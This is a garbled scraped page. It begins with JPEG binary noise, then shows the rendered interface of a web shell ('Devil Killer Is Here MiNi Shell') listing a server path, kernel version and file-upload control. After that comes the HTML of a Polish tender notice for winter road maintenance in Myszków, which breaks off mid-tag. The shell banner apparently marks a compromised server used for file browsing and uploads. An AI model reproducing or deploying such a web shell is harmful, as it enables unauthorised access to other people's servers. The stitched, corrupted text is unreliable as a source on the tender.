JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210715/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210715/0011530501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00115305 z dnia 2021-07-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie usług zimowego utrzymania dróg wojewódzkich i powiatowych utrzymywanych przez Powiatowy Zarząd Dróg w Myszkowie w sezonie zimowym 2021-2022” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Zarząd Dróg w Myszkowie z/s w Żarkach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151405866</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Myszkowska, 59</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żarki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343148304</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">343148304</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@pzd.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pzd.myszkow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka organizacyjna administracji samorządowej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie drogami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie usług zimowego utrzymania dróg wojewódzkich i powiatowych utrzymywanych przez Powiatowy Zarząd Dróg w Myszkowie w sezonie zimowym 2021-2022” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-99247774-e545-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00115305</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002847/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Świadczenie usług zimowego utrzymania dróg wojewódzkich i powiatowych utrzymywanych przez Powiatowy Zarząd Dróg w Myszkowie w sezonie zimowym 2021/2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/pzdmyszkow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu art. 2 pkt 5) ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t. j. Dz. z 2017, poz. 1219 ze zm.), tj. za pomocą elektronicznej Platformy Zamówień Publicznych Powiatowego Zarządu Dróg w Myszkowie pod adresem: https://portal.smartpzp.pl/pzdmyszkow (dalej zwaną: „Systemem”), do której dostęp możliwy jest również poprzez stronę internetową Zamawiającego www.pzd.myszkow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe zasady korzystania z Systemu, w tym wymagania sprzętowo — techniczne<br/>umożliwiające korzystanie z Systemu, szczegółowy sposób składania, zmiany i wycofania ofert,<br/>przekazywania oświadczeń, dokumentów zostały określone w Instrukcji dla Wykonawcy, dostępnej na<br/>stronie prowadzonego postępowania. Za datę przekazania oferty, wniosków, zawiadomień,<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz<br/>innych informacji przyjmuje się datę ich przekazania do Systemu. Maksymalny rozmiar pojedynczych<br/>plików przesyłanych za pośrednictwem Systemu wynosi 100 MB. Za pośrednictwem Systemu można<br/>przesłać wiele pojedynczych plików lub plik skompresowany do archiwum (ZIP) zawierający wiele<br/>pojedynczych plików. Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w<br/>formatach .png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar,<br/>.7zip, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg. Zadawanie pytań przez Wykonawców odbywa<br/>się w zakładce „Pytania do postępowania”. Po otwarciu ofert, komunikacja między Zamawiającym a<br/>Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy, w zakładce „Korespondencja”, która dla<br/>Wykonawcy jest widoczna w Zakładce „Oferty”, po zaznaczeniu numeru złożonej oferty. Za datę<br/>wpływu oświadczeń, wniosków, zaświadczeń oraz informacji przyjmuje się datę zapisania plików na<br/>serwerze. Aktualna data i godzina, zsynchronizowane z Głównym Urzędem Miar, wyświetlane są w<br/>prawym górnym rogu Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>▪ administratorem Pani/Pana danych osobowych jest Dyrektor Powiatowego Zarządu Dróg; może<br/>Pani/Pan uzyskać informacje o przetwarzaniu Pani/Pana danych osobowych w siedzibie Powiatowego<br/>Zarządu Dróg ul. Myszkowska 59, 42-310 Żarki .<br/>▪ inspektorem ochrony danych wyznaczonym przez Dyrektora jest Pani Anna Mstowska, email:<br/>iod@pzd.com.pl; tel. (34) 314-83-04<br/>▪ Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Zakup i dostawa piasku do<br/>zwalczania śliskości przy zimowym utrzymaniu dróg wojewódzkich i powiatowych w sezonie 2021/2022<br/>w całkowite ilości 3000 Mg” .<br/>1) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp;<br/>􀀀dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy;<br/>􀀀stosowanie do art. 22 RODO; posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>▪ nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZD/5/332/DW/SD/2021, PZD/7/342/DP/SD/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Likwidacja gołoledzi przy użyciu piaskarko-solarki zamontowanej na samochodzie ciężarowym wraz z odśnieżaniem pługiem średnim. <br/>Samochód ciężarowy pod piaskarko-solarkę musi posiadać napęd min. na dwie osie (dopuszcza się napęd 6x4) min.190 KM, dopuszcza się świadczenie usług samochodem ciężarowym z piaskarką (P-1) - w ilości określonej poniżej. Samochody ciężarowe z piaskarką i piaskarko-solarką muszą być wyposażone w pług średni, urządzenie GPS wraz z możliwością wydruku raportu pracy sprzętu oraz w telefon komórkowy i radio CB.<br/>Piaskarko-solarka – posyp prawy, posyp lewy lub całą szerokością, procentowe sterowanie ilości mieszanki, sterowanie piaskarko-solarki z kabiny samochodu (własny napęd niezależny od ruchu samochodu). <br/>Pług odśnieżny "średni" zamontowany na samochodzie ciężarowym wyposażonym w piaskarko-solarkę bądź piaskarkę, sterowanie pługiem z kabiny samochodu (w prawo, w lewo)<br/>Szacunkowy zakres do przepracowania w ramach realizacji usług:<br/> - 54.000,00 km (praca)<br/>- około 24.000,00 godz. dyżuru domowego<br/>Wymagana ilość jednostek sprzętowych - 7 szt.<br/>dopuszcza się zastosowanie jednostek sprzętowych o rodzaju i w ilości: opłużony samochód ciężarowy z zamontowaną piaskarko-solarką - min. 5 szt.; opłużony samochód ciężarowy z zamontowaną piaskarką (P-1) - min. 2 szt. <br/>Informacje dodatkowe: <br/>1.	Godziny „dyżuru domowego” dla części 1 liczone będą w okresie: 1 listopad 2021 r. do 31 marzec 2022 r.<br/>2.	Umowy na świadczenie usług zimowego utrzymania dróg wojewódzkich i powiatowych utrzymywanych przez Powiatowy Zarząd Dróg w Myszkowie w sezonie zimowym 2021/2022 będą obowiązywać od 1 listopada 2021 r. do 30 kwiecień 2022 r. - z zastrzeżeniem przedłużenia lub skrócenia wskazanego terminu w zależności od powstania, utrzymywania i zakończenia warunków zimowych w sezonie 2021/2022. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60181000-0 - Wynajem samochodów ciężarowych wraz z kierowcą</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oraz ich znaczeniem:<br/><br/>L.p.	<br/>Kryterium	Znaczenie kryterium<br/>(w %)	Liczba możliwych <br/>do uzyskania punktów<br/>1.	Cena łączna brutto realizacji zamówienia	60	60<br/>2.	Czas rozpoczęcia akcji	40	40<br/><br/>Zamawiający dokona oceny ofert przyznając punkty w ramach kryteriów oceny ofert, przyjmując zasadę, że 1 % = 1 punkt.<br/><br/>1.Cena łączna brutto realizacji zamówienia – 60% (C).<br/> <br/>Sposób punktacji przy założeniu, że 1% ze współczynników określonych wyżej odpowiada 1 punktowi, wg wzoru S=C<br/>gdzie:<br/>S – Suma punktów przyznanych ofercie – max.	60 punktów<br/>C – ilość punktów za oferowaną cenę (brutto) – max. 60 punktów<br/>	<br/>Oferta o najniższej cenie uzyska maksymalną ilość punktów 60.<br/>Pozostałym oferentom przyznana zostanie odpowiednio mniejsza ilość punktów wg wzoru:<br/>(Cn/Cb) x 60 = Wc<br/>	<br/>gdzie:<br/>WC – ilość punktów dla kryterium ceny<br/>Cn – najniższa łączna cena brutto realizacji zamówienia<br/>Cb – łączna cena brutto realizacji zamówienia oferty badanej<br/><br/><br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku. <br/><br/><br/>2 Czas rozpoczęcia akcji – 40 % (Cz).<br/><br/>Punkty za kryterium „Czas rozpoczęcia akcji” liczony będzie od złożenia dyspozycji ustnej bądź pisemnej przez upoważnionego przedstawiciela Zamawiającego, za każde 15 minut poniżej 60 min Zamawiający przyzna pkt następująco:<br/>- 60 minut -	0 pkt<br/>- 45 min - 20 pkt<br/>- 30 min -	40 pkt<br/><br/>Czas rozpoczęcia akcji nie może być dłuży niż 60 minut.<br/><br/>W przypadku braku wskazania przez Wykonawcę w Formularzu Ofertowym (załącznik nr 1 do SWZ) czasu rozpoczęcia akcji, zamawiający uzna, że wykonawca zobowiązuje się do realizacji przedmiotu zamówienia w czasie 60 minut i do obliczenia punktacji w niniejszym kryterium przyjmie czas 60 minut.<br/><br/>W przypadku wskazania przez Wykonawcę w Formularzu Ofertowym (załącznik nr 1 do SWZ) czasu rozpoczęcia akcji dłuższego niż 60 minut zostanie odrzucona.<br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która będzie przedstawiała najkorzystniejszy bilans punktów (P) za: <br/>- cena łączna brutto realizacji zamówienia<br/>- czas rozpoczęcia akcji<br/> w oparciu o następujący wzór:<br/>P= C + Cz<br/><br/>Wszystkie obliczenia zostaną dokonane z dokładnością do dwóch miejsc po przecinku.<br/><br/><br/>Jeżeli nie będzie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpoczęcia akcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Odśnieżanie równiarką samojezdną min. 120 KM - wyposażoną w lemiesz o zmiennej geometrii.<br/>Szacunkowy zakres do przepracowania w ramach realizacji usług dla CZĘŚCI 2 – 80,0 godz.<br/>Wymagana ilość jednostek sprzętowych dla CZĘŚCI 2 - 1 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oraz ich znaczeniem:<br/><br/>L.p.	<br/>Kryterium	Znaczenie kryterium<br/>(w %)	Liczba możliwych <br/>do uzyskania punktów<br/>1.	Cena łączna brutto realizacji zamówienia	60	60<br/>2.	Czas rozpoczęcia akcji	40	40<br/><br/>Zamawiający dokona oceny ofert przyznając punkty w ramach kryteriów oceny ofert, przyjmując zasadę, że 1 % = 1 punkt.<br/><br/>1.Cena łączna brutto realizacji zamówienia – 60% (C).<br/> <br/>Sposób punktacji przy założeniu, że 1% ze współczynników określonych wyżej odpowiada 1 punktowi, wg wzoru S=C<br/>gdzie:<br/>S – Suma punktów przyznanych ofercie – max.	60 punktów<br/>C – ilość punktów za oferowaną cenę (brutto) – max. 60 punktów<br/>	<br/>Oferta o najniższej cenie uzyska maksymalną ilość punktów 60.<br/>Pozostałym oferentom przyznana zostanie odpowiednio mniejsza ilość punktów wg wzoru:<br/>(Cn/Cb) x 60 = Wc<br/>	<br/>gdzie:<br/>WC – ilość punktów dla kryterium ceny<br/>Cn – najniższa łączna cena brutto realizacji zamówienia<br/>Cb – łączna cena brutto realizacji zamówienia oferty badanej<br/><br/><br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku. <br/><br/><br/>2 Czas rozpoczęcia akcji – 40 % (Cz).<br/><br/>Punkty za kryterium „Czas rozpoczęcia akcji” liczony będzie od złożenia dyspozycji ustnej bądź pisemnej przez upoważnionego przedstawiciela Zamawiającego, za każde 15 minut poniżej 60 min Zamawiający przyzna pkt następująco:<br/>- 60 minut -	0 pkt<br/>- 45 min - 20 pkt<br/>- 30 min -	40 pkt<br/><br/>Czas rozpoczęcia akcji nie może być dłuży niż 60 minut.<br/><br/>W przypadku braku wskazania przez Wykonawcę w Formularzu Ofertowym (załącznik nr 1 do SWZ) czasu rozpoczęcia akcji, zamawiający uzna, że wykonawca zobowiązuje się do realizacji przedmiotu zamówienia w czasie 60 minut i do obliczenia punktacji w niniejszym kryterium przyjmie czas 60 minut.<br/><br/>W przypadku wskazania przez Wykonawcę w Formularzu Ofertowym (załącznik nr 1 do SWZ) czasu rozpoczęcia akcji dłuższego niż 60 minut zostanie odrzucona.<br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która będzie przedstawiała najkorzystniejszy bilans punktów (P) za: <br/>- cena łączna brutto realizacji zamówienia<br/>- czas rozpoczęcia akcji<br/> w oparciu o następujący wzór:<br/>P= C + Cz<br/><br/>Wszystkie obliczenia zostaną dokonane z dokładnością do dwóch miejsc po przecinku.<br/><br/><br/>Jeżeli nie będzie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 